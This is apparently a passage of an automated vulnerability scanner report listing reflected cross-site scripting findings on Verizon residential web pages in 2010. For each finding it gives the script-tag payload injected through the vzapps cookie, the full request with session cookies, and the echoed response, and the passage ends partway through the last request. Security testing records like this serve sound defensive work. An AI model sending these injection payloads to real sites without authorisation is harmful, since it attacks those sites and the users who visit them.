1.122. http://www22.verizon.com/Residential/HomePhone/FiOSDigitalVoice/Features/Features.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/HomePhone/FiOSDigitalVoice/Features/Features.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 70270'><script>alert(1)</script>55b92e6b12d was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HomePhone/FiOSDigitalVoice/Features/Features.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX70270'><script>alert(1)</script>55b92e6b12d; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 307358
Expires: Sat, 20 Nov 2010 00:12:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:12:12 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:12 GMT; path=/
Set-Cookie: ContextInfo_State=TX70270'><script>alert(1)</script>55b92e6b12d; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:12 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:12 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:12 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX70270'><SCRIPT>ALERT(1)</SCRIPT>55B92E6B12D ' />
...[SNIP]...

1.123. http://www22.verizon.com/Residential/HomePhone/FiOSDigitalVoice/HowItWorks/HowItWorks.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/HomePhone/FiOSDigitalVoice/HowItWorks/HowItWorks.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 4a3fe<script>alert(1)</script>8693fabb78c was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HomePhone/FiOSDigitalVoice/HowItWorks/HowItWorks.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX4a3fe<script>alert(1)</script>8693fabb78c; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 202315
Expires: Sat, 20 Nov 2010 00:16:05 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:16:05 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:16:04 GMT; path=/
Set-Cookie: ContextInfo_State=TX4a3fe<script>alert(1)</script>8693fabb78c; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:16:04 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:16:04 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:16:04 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX4A3FE<SCRIPT>ALERT(1)</SCRIPT>8693FABB78C </DIV>
...[SNIP]...

1.124. http://www22.verizon.com/Residential/HomePhone/FiOSDigitalVoice/HowItWorks/HowItWorks.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/HomePhone/FiOSDigitalVoice/HowItWorks/HowItWorks.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2fb11'><script>alert(1)</script>c9082fb4a68 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HomePhone/FiOSDigitalVoice/HowItWorks/HowItWorks.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX2fb11'><script>alert(1)</script>c9082fb4a68; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 202319
Expires: Sat, 20 Nov 2010 00:16:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:16:03 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:16:03 GMT; path=/
Set-Cookie: ContextInfo_State=TX2fb11'><script>alert(1)</script>c9082fb4a68; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:16:03 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:16:03 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:16:03 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX2FB11'><SCRIPT>ALERT(1)</SCRIPT>C9082FB4A68 ' />
...[SNIP]...

1.125. http://www22.verizon.com/Residential/Internet/ [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/Internet/

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload a439f<script>alert(1)</script>4e7b1405640 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/Internet/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXa439f<script>alert(1)</script>4e7b1405640; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 73116
Expires: Sat, 20 Nov 2010 00:11:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:11:06 GMT
Connection: close
Set-Cookie: ContextInfo_State=TXa439f<script>alert(1)</script>4e7b1405640; path=/
Set-Cookie: ContextInfo_LoopQual=; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | Internet
</title><meta name="keywords" content="verizon internet services, verizon internet products, ISP, internet service, fios internet
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TXA439F<SCRIPT>ALERT(1)</SCRIPT>4E7B1405640 </DIV>
...[SNIP]...

1.126. http://www22.verizon.com/Residential/Internet/ [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/Internet/

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 18609'><script>alert(1)</script>38eb9406858 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/Internet/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX18609'><script>alert(1)</script>38eb9406858; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 73121
Expires: Sat, 20 Nov 2010 00:10:11 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:10:11 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX18609'><script>alert(1)</script>38eb9406858; path=/
Set-Cookie: ContextInfo_LoopQual=; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | Internet
</title><meta name="keywords" content="verizon internet services, verizon internet products, ISP, internet service, fios internet
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX18609'><SCRIPT>ALERT(1)</SCRIPT>38EB9406858 ' />
...[SNIP]...

1.127. http://www22.verizon.com/Residential/Services/ [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/Services/

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a33c2'><script>alert(1)</script>e9e9cf39ae6 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/Services/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXa33c2'><script>alert(1)</script>e9e9cf39ae6; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 55449
Expires: Sat, 20 Nov 2010 00:16:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:16:02 GMT
Connection: close
Set-Cookie: ContextInfo_State=TXa33c2'><script>alert(1)</script>e9e9cf39ae6; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | Internet | Essential Services
</title><meta name="keyword" content="verizon internet security, online backup, online sharing, file sharing
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXA33C2'><SCRIPT>ALERT(1)</SCRIPT>E9E9CF39AE6 ' />
...[SNIP]...

1.128. http://www22.verizon.com/Residential/Services/BackupandSharing/BackupandSharing.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/Services/BackupandSharing/BackupandSharing.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d2a62'><script>alert(1)</script>712158990f3 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/Services/BackupandSharing/BackupandSharing.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXd2a62'><script>alert(1)</script>712158990f3; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 60755
Expires: Sat, 20 Nov 2010 00:16:09 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:16:09 GMT
Connection: close
Set-Cookie: ContextInfo_State=TXd2a62'><script>alert(1)</script>712158990f3; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | Essential Services: Backup and Sharing
</title><meta name="keywords" content="back up pc, backup pc, pc backup, back up Mac, back up Macin
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXD2A62'><SCRIPT>ALERT(1)</SCRIPT>712158990F3 ' />
...[SNIP]...

1.129. http://www22.verizon.com/Residential/Services/SecuritySuite/SecuritySuite.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/Services/SecuritySuite/SecuritySuite.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7daef'><script>alert(1)</script>c934f3f7b2c was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/Services/SecuritySuite/SecuritySuite.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX7daef'><script>alert(1)</script>c934f3f7b2c; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 64651
Expires: Sat, 20 Nov 2010 00:16:17 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:16:17 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX7daef'><script>alert(1)</script>c934f3f7b2c; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | Essential Services: Internet Security Suite
</title><meta name="keywords" description="anti-virus, firewall, anti-spyware, internet parent
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX7DAEF'><SCRIPT>ALERT(1)</SCRIPT>C934F3F7B2C ' />
...[SNIP]...

1.130. http://www22.verizon.com/Residential/Services/TechnicalSupport/TechnicalSupport.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/Services/TechnicalSupport/TechnicalSupport.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c5db1'><script>alert(1)</script>7ef783c9f97 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/Services/TechnicalSupport/TechnicalSupport.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXc5db1'><script>alert(1)</script>7ef783c9f97; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 60724
Expires: Sat, 20 Nov 2010 00:16:16 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:16:16 GMT
Connection: close
Set-Cookie: ContextInfo_State=TXc5db1'><script>alert(1)</script>7ef783c9f97; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | Essential Services: Expert Care
</title><meta name="keywords" content="computer support, tech support, pc support, computer services, comp
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXC5DB1'><SCRIPT>ALERT(1)</SCRIPT>7EF783C9F97 ' />
...[SNIP]...

1.131. http://www22.verizon.com/Residential/TV/ [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/TV/

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8fc1d'><script>alert(1)</script>57067391278 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/TV/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX8fc1d'><script>alert(1)</script>57067391278; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 76231
Expires: Sat, 20 Nov 2010 00:11:46 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:11:46 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX8fc1d'><script>alert(1)</script>57067391278; path=/
Set-Cookie: ContextInfo_LoopQual=; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | FIOS TV + HD TV Service
</title><meta name="keywords" content="video on demand, vod, premium cable tv, cable service, cable internet, dsl
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX8FC1D'><SCRIPT>ALERT(1)</SCRIPT>57067391278 ' />
...[SNIP]...

1.132. http://www22.verizon.com/Residential/TV/ [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/TV/

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 6c93f<script>alert(1)</script>ad59696c099 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/TV/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX6c93f<script>alert(1)</script>ad59696c099; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 74630
Expires: Sat, 20 Nov 2010 00:12:07 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:12:07 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX6c93f<script>alert(1)</script>ad59696c099; path=/
Set-Cookie: ContextInfo_LoopQual=; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | FIOS TV + HD TV Service
</title><meta name="keywords" content="video on demand, vod, premium cable tv, cable service, cable internet, dsl
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX6C93F<SCRIPT>ALERT(1)</SCRIPT>AD59696C099 </DIV>
...[SNIP]...

1.133. http://www22.verizon.com/Residential/WiFi/ [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/WiFi/

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload c1b7b<script>alert(1)</script>28eee026df0 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/WiFi/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
